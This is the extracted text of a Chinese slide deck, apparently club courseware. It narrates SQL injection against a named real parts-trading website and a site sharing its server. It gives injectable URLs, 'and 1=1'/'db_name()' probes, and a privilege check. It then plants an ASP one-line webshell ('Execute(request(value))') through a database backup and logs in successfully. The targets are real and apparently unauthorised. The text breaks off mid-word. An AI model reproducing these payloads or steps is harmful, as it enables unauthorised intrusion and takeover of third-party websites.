信息安全协会课件.pptVIP

二、网站入侵之注入 目前的网站注入漏洞，随处可见，为什么有注入漏洞？那是因为网站里存在数据库，并可以执行sql语句。我写的资料上已经也写得很详细了，这就不多说了。asp注入很流行，主要有两种数据库,sql和access，我要讲的是sql，而这种数据库又分几种权限： public（公用）;db_owner(可以列网站目录);sa(系统管理员权限) 信息安全协会 我们今天的目标是: (中国塑机配件网) 信息安全协会 用到的工具有: 1 、啊D 2 、黑鹰VIP版GetWebShell V 1.0 用啊D扫描注入点 /p_sujilist.asp? action=searchszSheng=22扫到了，我 就不手工判断了，我的博客和资料上也写得 有。 信息安全协会 得到的结果有:类型是数字的;数据库是:sujicn 数据库类型是：MSSQL当前权限：DB_OWNER 当前数据库用户名:sujicn_2005 我们直接用 工具来列取 目录，目录 我已经找到 了: F:\web\sujicn\ 信息安全协会 现在我们用黑鹰VIP版GetWebShell V 1.0来备份木马按 照得到的 信息填写 好，点完 6步。 信息安全协会 地址是：/ceshi.asp打开看看 备份成功了 信息安全协会 我们用一句话木马连接端来连接 /hack.html 填写好地址，我们直接传大马，点击冲进去。 信息安全协会 /ceshi1.asp成功了 输入密码进入 信息安全协会 成功登陆 下一课我也是检测这个网站只是用跨站进入 信息安全协会 我们开始吧，目标也是: (中国塑机配件网)我们用另一种方法检测（跨站） 这个网站是和同服务上的; 我们讲通过这个 网站达到检测 的目的。 信息安全协会 我们开始吧，目标是: (中国塑机配件网)我们用另一种方法检测（跨站） 信息安全协会 我们来看看有不有注入点 这就是他的注入点 /callingjuti.asp?id=209 信息安全协会 怎么判断： 1.先判断是字符还是数字型的，用单引号判断 如果报错说明是数字的，否则是字符的。 /callingjuti.asp?id=209 信息安全协会 怎么判断： 2、用and 1=1,and 1=2判断；如果 /callingjuti.asp?id=209 and 1=1返回 和/callingjuti.asp?id=209相同 信息安全协会 怎么判断： 2、用and 1=1,and 1=2判断；如果 /callingjuti.asp?id=209 and 1=2返回 和/callingjuti.asp?id=209不相同 信息安全协会 如果同时满足以上三个条件的话，那么该网站就可能存在注入漏洞，但是这个网站不这样的，也是我要讲这个网站的原因，它不管输入什么都报错，这样就让我们认为它不存在注入点，其实它是存在注入的。 信息安全协会 信息安全协会 我们来测试一下,暴它的数据库名： /callingjuti.asp?id=209 and db_name()0 返回了数据库名：win001 信息安全协会 判断当前数据库用户名: /callingjuti.asp?id=209 and user0 返回了当前数据库用户名:win001 信息安全协会 判断是不是DB_OWNER权限的： /callingjuti.asp?id=209 and 1=(select IS_MEMBER(db_owner));-- 但是这个网站还是不能判断,全都是说错，讲的就是讲特殊的， 在我的资料上，都是常见的。 信息安全协会 现在我们用到的工具有 1。啊D注入工具 2。黑鹰VIP专版GetWebShell V 1.0 我们首先用啊D来列出网站的目录， 在用黑鹰VIP专版GetWebShell V 1.0 来备份数据库，经过列目录发现在 f:\win001\这个目录下面。 信息安全协会 现在来数据库备份，把得到信息填好 %%25Execute(request(value))%%25是一句话木马代码， 依次点6步。 本来都返回 正常页面但 是他都是返 回错误，我 们不用管， 我们看看木 马备份成功 没， 地址是： /pd.asp 信息安全协会 备份成功了 信息安全协会 现在我们用一句话连接端来连接 /hack.html 填上地址，点冲进，去我们可以看见这是不行的，不能写入。 信息安